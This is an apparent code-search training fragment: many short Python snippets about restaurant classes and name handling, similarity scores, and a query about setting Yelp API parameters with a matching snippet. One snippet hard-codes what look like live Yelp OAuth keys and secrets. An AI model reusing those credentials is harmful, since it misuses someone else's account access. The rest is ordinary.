"def __init__(self, restaurant_name, cuisine_type):\r\n\t\tself.restaurant_name = restaurant_name\r\n\t\tself.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type",
"def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = [\"Chocolate\", \"Vanilla\", \"Strawberryes\"]",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = [\"vanilla\", \"chocolate\", \"strawberry\", \"raspberry\",\n \"cream cheese\", \"blueberry\", \"snickers\", \"chocolate chip\"]",
"def names(cls) -> List[str]:",
"def __init__(self, restaurant_name, cuisine_type):\n super().__init__(restaurant_name, cuisine_type)\n self.flavors = ['chocolate', 'peanut', 'strawberry']",
"def names(self) -> List:\n ...",
"def __init__(self,restaurant_name, cuisine_type):\r\n\t\tsuper().__init__(restaurant_name,cuisine_type)\r\n\t\tself.flavors = ['chocolate', 'pistachio','mint','vanilla']",
"def names():\n pass",
"def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"",
"def names(self) -> list[str]:",
"def __init__(self, restaurant_name,cuisine_type):\r\n self.restaurant = restaurant_name\r\n self.cuisine = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type\n self.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type\n self.number_served = 0",
"def names(filter=None):",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type, number_served=0):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = number_served",
"def appending_food_item_names(food_item_names: list) -> None:\n for item in _calories:\n food_item_names.append(item)",
"def describe_restaurant(self):\n print(self.name.title() + \" is known for it's \" + self.cuisine.title() + \".\")",
"def __select_names(self, names):\n random.shuffle(names)\n selected = [names[0]]\n if random.random() > 0.7: # 30% de chances de ter dois nomes\n selected.append(names[1])\n return selected",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
"def _complete_name(self, cr, uid, ids, name, args, context=None):\n res = {}\n#####added \n context=context or {}\n \n for m in self.browse(cr, uid, ids, context=context):\n if context.get('no_complete_name'):\n res[m.id] = m.name\n return res\n names = [m.name]\n parent = m.location_id\n while parent:\n names.append(parent.name)\n parent = parent.location_id\n res[m.id] = ' / '.join(reversed(names))\n return res",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.numbers_served = 0",
"def names(self) -> PlaceNames | None:\n pass",
"def getNames(self) -> List[unicode]:\n ...",
"def describe_restaurant(self):\n\t\tprint(f\"The resaurant name is {self.restaurant_name}.\")\n\t\tprint(f\"The resaurant type is {self.restaurant_type}.\")",
"def describeRestaurant(self):\n print (f\"{self.name} has the best {self.cuisineType}\")",
"def test_name_returner(self):\n test = self.data.name_returner()\n self.assertIn(('Trevor', 'Harvey'), test)\n self.assertIn(('Nik', 'Silver'), test)",
"def describe_restaurant(self):\n\t\tprint(\"name of the restaurant is \" + self.restaurant_name)\n\t\tprint(\"cuisine type is \" + self.cuisine_type)",
"def __init__(self,restaurant_name,cuisine_type='ice-cream'):\r\n super().__init__(restaurant_name,cuisine_type)\r\n self.flavors = []",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
"def nameList(self):\r\n return [self.name.lower(), self.code] + self._otherNames",
"def _get_names(self):\n if len(self.firstnames):\n return self.firstnames, self.lastnames\n\n if os.path.exists(\"/code/api/app/utils/names.txt\"):\n with open(\"/code/api/app/utils/names.txt\") as file_with_names:\n names = file_with_names.readlines()\n else:\n # why yes, these are names of African Hollywood actors (according to Wikipedia)\n names = [\"Mehcad Brooks\", \"Malcolm Barrett\", \"Nick Cannon\", \"Lamorne Morris\", \"Neil Brown Jr.\",\n \"William Jackson Harper\", \"Marques Houston\", \"Jennifer Hudson\", \"Alicia Keys\", \"Meghan Markle\",\n \"Beyonce Knowles\", \"Jesse Williams\", \"Lance Gross\", \"Hosea Chanchez\", \"Daveed Diggs\",\n \"Damon Wayans Jr.\", \"Columbus Short\", \"Terrence Jenkins\", \"Ron Funches\", \"Jussie Smollett\",\n \"Donald Glover\", \"Brian Tyree Henry\", \"Gabourey Sidibe\", \"Trai Byers\", \"Robert Ri'chard\",\n \"Arjay Smith\", \"Tessa Thompson\", \"J.Lee\", \"Lauren London\", \"DeVaughn Nixon\", \"Rob Brown\", ]\n for _name in names:\n split_name = _name.strip().split(\" \")\n self.firstnames.append(split_name[0])\n lastname = \" \".join(split_name[1:]) if len(split_name) > 1 else \"\"\n self.lastnames.append(lastname)\n return self.firstnames, self.lastnames",
"def __init__(self, nome, tipo):\n self.restaurant_name = nome\n self.cuisine_type = tipo",
"def describe_restaurant(self):\r\n\t\tprint(\"Our restaurant is \" + self.restaurant_name.title() + \".\")\r\n\t\tprint(\"We are known for our \" + self.cuisine_type.title())",
"def describe_restaurant(self):\n\t\tprint(f\"{self.restaurant_name.title()} serves {self.cuisine_type}.\")",
"def donor_names():\n names = list()\n for name in donor_db:\n names = names + [name[0]]\n return names",
"def describe_restaurant(self):\n msg = f\"{self.name} serves wonderful {self.cuisine_type}.\"\n print(f\"\\n{msg}\")",
"def generate(self):\n return Name(forename=choice(self.first_names, p=self.first_name_freq),\n surname=choice(self.last_names, p=self.last_name_freq))",
"def test_names():\n first = get_name(\"As\")\n assert first == \"Arsenic\"\n\n second = get_name(\"Be\")\n assert second == \"Beryllium\"\n\n third = get_name(\"Li\")\n assert third == \"Lithium\"",
"def names(self):\n if isinstance(self.name, string_types):\n return [self.name]\n else:\n return list(self.name)",
"def describe_restaurant(self):\n print(f\"\\nRestaurant name: {self.restaurant_name}\")\n print(f\"Cuisine type: {self.cuisine_type}\")",
"def TransformNames(self) -> _n_2_t_0[str]:",
"def named_entities(self) -> List[str]:",
"def getRestaurantAddressDict(restaurants):\n addressdict = {}\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addressdict[addressstring] = rest['name']\n\n return addressdict",
"def names(self):\n\t\treturn",
"def __get_names(self): \n names_str = self.names_text.get(1.0, END)\n names = names_str.splitlines()\n return names",
"def get_names_short(self):\r\n return [p.get_name() for p in self.people]",
"def describe_restaurant(self):\n\t\tdetails = f\"{self.restaurant_name} is a {self.cuisine_type} restaurant.\"\n\t\tprint(f\"\\n{details}\")",
"def generate_list_of_names(self):\n names = [donor._full_name for donor in self.donor_list]\n name_selection = \"\\n\".join(\n [\"{}\"] * len(self.donor_list)).format(*names)\n return name_selection",
"def resolveNames(self):\n client.resolveNames(self)\n # TODO: Do any name resolutions here.\n # The names of other objects this object refers to, either intrinsically or in its parameters, should be checked here.",
"def personas(self, pretty=True, sort=True):\n names = list(self.name2base)\n if pretty: names = [self.process_name(name, True) for name in names]\n if sort: names = sorted(names)\n return names",
"def getRestaurantAddresses(restaurants):\n addresslist = []\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addresslist.append(addressstring)\n\n # pprint.pprint(addresslist)\n return addresslist",
"def resolveResult(self, restaurants):\n restaurant_list = []\n for restaurant in restaurants:\n restaurant_list.append({'Name': restaurant['restaurant']['name'], \"cuisines\": [x.strip() for x in restaurant['restaurant']['cuisines'].split(',')],\n \"lat\": restaurant['restaurant']['location']['latitude'], \"long\": restaurant['restaurant']['location']['longitude'], \"highlights\": restaurant['restaurant']['highlights'], \"Thumb\": restaurant['restaurant']['thumb'],\n \"user_Rating\": restaurant['restaurant']['user_rating']['aggregate_rating'],\"phone_Numbers\": restaurant['restaurant']['phone_numbers']})\n cuisineDict = { \"Chinese\":1, \"Korean\":2,\"Australia\":3,\"Japanese\":4,}\n WordDict = {1: \"cozy\",2: \"tasty\",3:'amazing',4:'flavorful',5:'yummy'}\n for i in range(len(restaurant_list)):\n icon = 5\n cuisines = restaurant_list[i][\"cuisines\"]\n adjective = WordDict[random.randint(1,5)]\n comment = \"This is a \"+ adjective\n if cuisines:\n if \"Chinese\" in cuisines:\n icon = 1\n elif \"Korean\" in cuisines:\n icon = 2\n elif \"Australia\" in cuisines:\n icon = 3\n elif \"Japanese\" in cuisines:\n icon = 4\n else:\n icon = 5\n comment = comment + \" \" + cuisines[0]\n restaurant_list[i]['icon'] = icon\n comment = comment + \" restaurant\"\n restaurant_list[i]['comment'] = comment\n res = {\"restaurants\":restaurant_list }\n return res",
"def test_return_all_names(self):\n test = self.data.return_all(first_name='Nik', last_name='Silver')\n self.assertEqual(test[0].first_name, 'Nik')\n\n test_2 = self.data.return_all(first_name='Trevor', last_name='Harvey')\n self.assertEqual(test_2[0].last_name, 'Harvey')",
"def Restaurant_get_info() -> Restaurant:\r\n name = input(\"Please enter the restaurant's name: \")\r\n cuisine = input(\"Please enter the kind of food served: \")\r\n phone = input(\"Please enter the phone number: \")\r\n menu = menu_enter()\r\n return Restaurant(name, cuisine, phone, menu)",
"def getNames(self, resname, atomname):\n rname = None\n aname = None\n if resname in self.map:\n res = self.map[resname]\n if res.hasAtom(atomname):\n atom = res.atoms[atomname]\n aname = atom.name\n rname = atom.resname\n return rname, aname",
"def get_alternate_names(self, alt_list):\n self.alternates = [a.name for a in alt_list if a.raga == self.name]",
"def names(\n self\n ) -> Tuple[str, ...]:\n return self._names",
"def find_names(s):\n \"*** YOUR CODE HERE ***\"",
"def describe_restaurant(self):\n print(f\"{self.restaurant_name} is a new restaurant opening on Main Street!\")\n print(f\"The restaurant specializes in {self.cuisine_type}-style food.\")",
"def director_name(self, director_name):",
"def __init__(self, name):\n self.name = name.replace(\" \", \"-\").lower()",
"def test_data_object_get_names_all(self):\n pass",
"def getShoppingListByName(cls, name, user):\n\n shop_list = db.session.query(Ingredient.aisle,Ingredient.name,ShoppingList.date_created).\\\n join(ShoppingList).\\\n filter(ShoppingList.ingredient_fk == Ingredient.name).\\\n filter(ShoppingList.name == name).\\\n filter(ShoppingList.user_fk == user).all()\n\n return shop_list",
"def get_names():\n only_links = SoupStrainer(\"a\")\n names = set()\n doc = requests.get(NAMES_URL).content\n links = BeautifulSoup(doc, \"html.parser\", parse_only=only_links)\n pokemon = links.find_all(title=re.compile(\"(\\w+)(\\s){1}(\\(Pokémon\\))\"))\n for cell in pokemon:\n names.add(str(cell.string))\n \n\n return names",
"def describe_restaurant(self):\n print(f\"{self.restaurant_name} is a new restaurant opening on Main Street!\")\n print(f\"The restaurant specializes in {self.cuisine_type}.\")",
"def process_names( names ):\n\tp_list = []\n\tfor i in xrange( len( names ) ):\n\t\t#print i\n\t\tp_list.append( str(i) + \"__\" + names[i] )\n\n\tRV = \";\".join(p_list)\n\treturn( RV )",
"def test_create_restaurant_with_name_creator_only(self):\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n name = 'Restaurant Chinois'\n info = {'name': name, 'creator': '[email protected]'}\n resp = self.test_client.post(self.API_BASE + '/create', headers=headers, data=json.dumps(info))\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertTrue(name in resp_dict['message'])",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.names = ['Alice', 'Bob', 'Thomas', 'Belinda', 'Charlie']",
"def listBuilderNames():",
"def listBuilderNames():",
"def add_names(self, *sNames):\n self.names += list(sNames)",
"def _find_names(place):\n tags = place['tags']\n tags_names = ['name', 'place_name', 'alt_name']\n names = []\n for tag in tags_names:\n try:\n names.extend(tags[tag].split(';'))\n except KeyError:\n pass\n if not names:\n print \"Place has no name (#{})\".format(place['id'])\n return names",
"def __init__(self, **kwargs):\n super().__init__(list)\n\n for name, value in kwargs.items():\n normalized_name = \"-\".join(name.split(\"_\")).lower()\n self.add(normalized_name, value)",
"def test_legal_names(self):\n names = [prod.name for prod in generate_products()]\n sep = [(name.split()[0], name.split()[1]) for name in names]\n for name in sep:\n self.assertIn(name[0], ADJS)\n self.assertIn(name[1], NOUNS)",
"def name_generator(suggested, forbidden_names):\n new_name = suggested.strip()\n while new_name.lower() in [x.lower() for x in forbidden_names]:\n new_name += str(random.choice(string.ascii_lowercase))\n return new_name.strip()",
"def test_full_name(self):\n self.assertEqual(self.john.full_name, \"John Doe\")\n self.assertEqual(self.solar.full_name, \"Nathan Graule\")",
"def names(self):\n if type(self.name) is types.StringType:\n return [self.name]\n else:\n return list(self.name)",
"def __init__(self, name_s, items_in_store):\r\n self.name_s = name_s\r\n self.items_in_store = items_in_store",
"def split_name(fullname):",
"def __init__(self, name_a: str, name_b: str) -> None:\n self.names = tuple(sorted((name_a, name_b)))",
"def load_existing_names(self, region_name, types=None):\n if types:\n existing_places = self._request_typed_existing(region_name, types)\n else:\n existing_places = self._request_existing(region_name)\n place_names = []\n for place in existing_places:\n place_names.extend(self._find_names(place))\n return [self._sanitise_name(place) for place in place_names]",
"def __init__(self, _name, _drink=menu.water, _food=menu.bread):\n self.name = _name\n self.drinks = []\n self.food = []\n self.drinks.append(_drink)\n self.food.append(_food)",
"def get_name():",
"def example_usernames():\n return [\"A\", \"B\", \"C\"]",
"def separate_names (name, alt_name=None):\n\n names = name.split(' ')\n\n # Pop first item in list\n first_name = names.pop(0)\n # middle_name = None\n last_name = None\n\n if len (names):\n # Pop last item of list\n # last_name = names.pop()\n\n # We got rid of middle name so now the rest of the names are last name\n last_name = ' '.join(names)\n\n elif alt_name:\n last_name = alt_name\n\n # if len (names):\n # # Middle name(s) are the rest of the list\n # middle_name = ' '.join(names)\n\n return {\n \"first_name\": first_name,\n # \"middle_name\": middle_name if middle_name else '',\n \"last_name\": last_name if last_name else ''\n }",
"def return_names(self):\n return self.__name_list",
"def build_menu(names,values,calories):\n menu=[]\n for i in range(len(names)):\n menu.append(Food(values[i],calories[i],names[i]))\n\n return menu",
"def drug_names_on_drug_list(drug_list):\n return [dl[\"Drug (brand name)\"] for dl in drug_list]",
"def set_Names(self, value):\n super(GetTokenDetailsInputSet, self)._set_input('Names', value)"
] | [
"0.64432555",
"0.63475114",
"0.63256043",
"0.62955445",
"0.6226382",
"0.6113798",
"0.6113798",
"0.6113798",
"0.6090916",
"0.6087849",
"0.6081929",
"0.60531896",
"0.6052965",
"0.6027582",
"0.60216314",
"0.6010803",
"0.58969116",
"0.58843607",
"0.587389",
"0.5793254",
"0.5793254",
"0.5779338",
"0.57611746",
"0.57611746",
"0.57280326",
"0.5649751",
"0.5649396",
"0.5645619",
"0.5645497",
"0.56404555",
"0.563474",
"0.56264454",
"0.5624207",
"0.5616123",
"0.56058276",
"0.55924475",
"0.5590253",
"0.5586419",
"0.5578187",
"0.5578187",
"0.55679375",
"0.5558778",
"0.5548517",
"0.55411434",
"0.5536072",
"0.5501316",
"0.5492034",
"0.5488161",
"0.5479375",
"0.543837",
"0.54245496",
"0.54151386",
"0.541205",
"0.5386864",
"0.5379247",
"0.536815",
"0.53610533",
"0.53504634",
"0.5346764",
"0.5340859",
"0.53260887",
"0.5325389",
"0.5317212",
"0.5313492",
"0.5303807",
"0.53001267",
"0.52888227",
"0.5287953",
"0.5287699",
"0.5287117",
"0.5268209",
"0.52571744",
"0.5256668",
"0.5254549",
"0.52544624",
"0.52522653",
"0.5251631",
"0.52487695",
"0.5230652",
"0.5228956",
"0.5228956",
"0.5203118",
"0.5195022",
"0.5186803",
"0.5175549",
"0.51755166",
"0.5170086",
"0.51666445",
"0.5159072",
"0.5158205",
"0.51572704",
"0.5152853",
"0.51480067",
"0.5139222",
"0.51375353",
"0.51328784",
"0.5130726",
"0.5128176",
"0.5120119",
"0.51170015"
] | 0.53139603 | 63 |
set the parameters for yelp API | def get_search_parameters(self, name):
params = {}
params["term"] = str(name)  # search term, e.g. the restaurant name
params["sort"] = "0"  # 0 = best-matched ordering in the Yelp v2 search API
params["radius_filter"] = "2000"  # search radius in meters; the v2 parameter is radius_filter, not radius.filter
params["limit"] = "1"  # return only the first search result
params["location"] = "Mesa, AZ"
return params | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set_params(self, **kwargs):\n ...",
"def api_connect(self, params):\n\t\tconsumer_key = \"XwD3f3Yoe2GcjqXSd5kRkA\"\n\t\tconsumer_secret = \"VtZMCNmBNEardBkIXo-RU7De-wU\"\n\t\ttoken = \"JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ\"\n\t\ttoken_secret = \"S4XUSKiIcUCYnlC3q7FYgUC47co\"\n\t\t\n\t\tsession = rauth.OAuth1Session(consumer_key = consumer_key,\n\t\tconsumer_secret = consumer_secret,\n\t\taccess_token = token,\n\t\taccess_token_secret = token_secret,\n\t\t)\n\t\t\n\t\trequest = session.get(\"http://api.yelp.com/v2/search\",params=params)\n\t\t\n\t\tdata = request.json()\n\t\tsession.close()\n\t\t\n\t\treturn data",
"def set_params(self):\r\n pass",
"def set_params(self, **kwargs) -> NoReturn:\n pass",
"def set_params(self, params):",
"def params_helper(self,**kwargs):\n\n dic = {'output' : 'json, xml, kml',\n 'maxresults' : 'limit on max number of results returned ; Default is limited to 100',\n 'countrycode' : 'GB, US etc ISO Country Code ==> Only 2 caracters !',\n 'latitude' : 'latitude reference for distance calculation',\n 'distance' : 'return results based on specified distance from specified latitude/longitude',\n 'distanceunit' : 'Miles or km',\n 'operatorid' : 'exact match on a given EVSE operator id (comma separated list)',\n 'connectiontypeid' : ' exact match on a given connection type id (comma separated list)',\n 'countryid' : 'exact match on a given country id (comma separated list)',\n 'levelid' : 'exact match on a given charging level (1-3) id (comma separated list)',\n 'minpowerkw' : 'minimum output power in kW (this information is not known for many locations)',\n 'usagetypeid' : 'exact match on a given usage type id (comma separated list) ',\n 'statustypeid' : ' exact match on a given status type id (comma separated list)',\n 'dataproviderid ' : 'exact match on a given data provider id id (comma separated list). Use opendata=true for only OCM provided (\"Open\") data.',\n 'modifiedsince' : 'POIs modified since the given date (UTC) e.g. 2016-09-15T09:30',\n 'opendata' : ' true or false. Set to true to include only Open Data licensed content, false to return only non-open licensed data. By default all available data is returned.',\n 'includecomments' : ' true or false. Set to true to also include user comments and media items (photos) per charging location. Default = false.',\n 'verbose ' : ' true or false. Set to false to get a smaller result set with null items removed. Default = true.',\n 'compact ' : 'true or false. Set to true to remove reference data objects from output (just returns IDs for common reference data such as DataProvider etc). Default = false.',\n 'camelcase' : 'true or false. Set to true to get a property names in camelCase format. Default = false',\n 'callback' : 'specify the name of the JSONP callback (if required), JSON response type only.'\n }\n\n if len(kwargs)==0 :\n\n for key in dic.keys() :\n print(key)\n\n else :\n \n for k in kwargs: \n print(dic.get(k))",
"def set_params(self):\n raise NotImplementedError",
"def search_yelp(params):\n url = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + os.environ['YELP_KEY']}\n resp = requests.get(url=url, params=params, headers=headers)\n responses = resp.json()\n return responses",
"def ask(self):\n self.term = str(input(\"What are you looking for? (Coffee, Restaurants, Museums, Bars) \"))\n if self.term.lower() == 'quit':\n sys.exit()\n self.destination = str(input(\"Where are you looking to go? (Neighborhood, City or City, State) \"))\n if self.destination.lower() == 'quit':\n sys.exit()\n \n \n #Request/JSON\n self.request = self.session.get(\"http://api.yelp.com/v2/search\", params={'term': self.term,'location': self.destination})\n self.request = self.request.json()\n \n #Dataframing\n self.menu = json_normalize(self.request['businesses'])\n self.menu.index = list(range(1, 21))\n self.menu = self.menu[['name', 'categories', 'location.address', 'location.city', 'location.coordinate.latitude', \\\n 'location.coordinate.longitude', 'review_count', 'rating', 'snippet_text']]\\\n .sort_values(['rating'], ascending=False).sort_index()",
"def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])",
"def update_params(self):\n pass",
"def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined for locator of type \" +\n str(type(self)))",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def good_params():\n from scraper import PARAMS\n params = PARAMS.copy()\n params['Business_Name'] = 'CodeFellows'\n params['City'] = 'Seattle'\n return params",
"def set_parameters(self, params):\n self.kp = params.pgain",
"def __init__(self, find=None, near=None, max_results=3, **kwargs) -> None:\n super(YelpSpider, self).__init__(**kwargs)\n self.find = find\n self.near = near\n self.max_results = int(max_results)",
"def set_related_params(self,request,responsedata):\n pass",
"def setParams(self, paramSet):\r\n pass",
"def set_parameters(api_name='',\r\n targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='large',\r\n loss_type='triplet',\r\n dataset_type='vgg',\r\n target_model='large',\r\n target_loss='center',\r\n target_dataset='VGG',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=20,\r\n binary_steps=5,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=15.0,\r\n amplification=6.0,\r\n granularity='normal',\r\n whitebox_target=False,\r\n pair_flag='false'):\r\n \r\n params = {}\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['target_model'] = target_model\r\n params['target_loss'] = target_loss\r\n params['target_dataset'] = target_dataset\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['test_dir'] = TEST_DIR\r\n params['full_dir'] = FULL_DIR\r\n params['whitebox_target'] = whitebox_target\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['pair_flag'] = string_to_bool(pair_flag)\r\n params['api_name'] = api_name\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if dataset_type == 'vggsmall' and not whitebox_target:\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n ValueError('ValueError: Super interpolation not yet implemented.')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if granularity == 'fine':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 20.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'normal':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 10.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.5)\r\n elif granularity == 'coarse':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 5.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'coarser':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarsest':\r\n params['margin_list'] = 
np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'single':\r\n params['margin_list'] = np.array([margin])\r\n params['amp_list'] = np.array([amplification])\r\n elif granularity == 'fine-tuned':\r\n params['margin_list'] = np.arange(10.0, margin, 1.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarse-single':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.array([1.0])\r\n elif granularity == 'api-eval':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.8)\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [fine, normal, coarse, coarser, single].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = '_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['target_model_name'] = '{}_{}_{}'.format(target_model, target_loss, target_dataset)\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n params['directory_path'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/full'.format(params['attack_loss']))\r\n params['directory_path_crop'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/crop'.format(params['attack_loss']))\r\n params['directory_path_npz'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n params['api_path'] = os.path.join(ROOT,\r\n API_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n if params['mean_loss'] == 'embedding':\r\n params['directory_path'] += '_mean'\r\n params['directory_path_crop'] += '_mean'\r\n params['directory_path_npz'] += '_mean'\r\n params['api_path'] += '_mean'\r\n\r\n return params",
"def yelp(n=1):\n tweet = get_tweet(YELP_NAME, n) # Yelp checkin info aggregated to twitter.\n yelp_info = {\n 'biz-name': parse_yelp_name(tweet.text),\n 'biz-uri': parse_yelp_uri(tweet.text),\n 'location': 'San Francisco, CA',\n 'date': tweet.created_at.strftime('%A, %B %d'),\n 'time': tweet.created_at.strftime('%H:%M'),\n 'tip': \"\",\n }\n return jsonify(yelp_info)",
"def init_params():\r\n\r\n p = OrderedDict()\r\n p['startYear'] = 1855\r\n p['num5YearAgeClasses'] = 25\r\n p['numCareLevels'] = 5\r\n p['pixelsInPopPyramid'] = 2000\r\n p['pixelsPerTown'] = 16 # 56\r\n p['mapGridXDimension'] = 20\r\n p['mapGridYDimension'] = 25\r\n p['careLevelColour'] = ['deepskyblue','green','yellow','orange','red']\r\n p['careDemandInHours'] = [ 0.0, 12.0, 24.0, 48.0, 96.0 ]\r\n p['unmetNeedColor'] = ['deepskyblue','green','yellow','orange','red', 'mediumorchid']\r\n p['houseSizeColour'] = ['deepskyblue','green','yellow','orange','red', 'mediumorchid']\r\n p['mainFont'] = 'Helvetica 18'\r\n p['fontColour'] = 'white'\r\n p['dateX'] = 70\r\n p['dateY'] = 20\r\n p['popX'] = 70\r\n p['popY'] = 50\r\n p['delayTime'] = 0.0\r\n p['maxTextUpdateList'] = 12\r\n \r\n return p",
"def _update_params(self):\n pass",
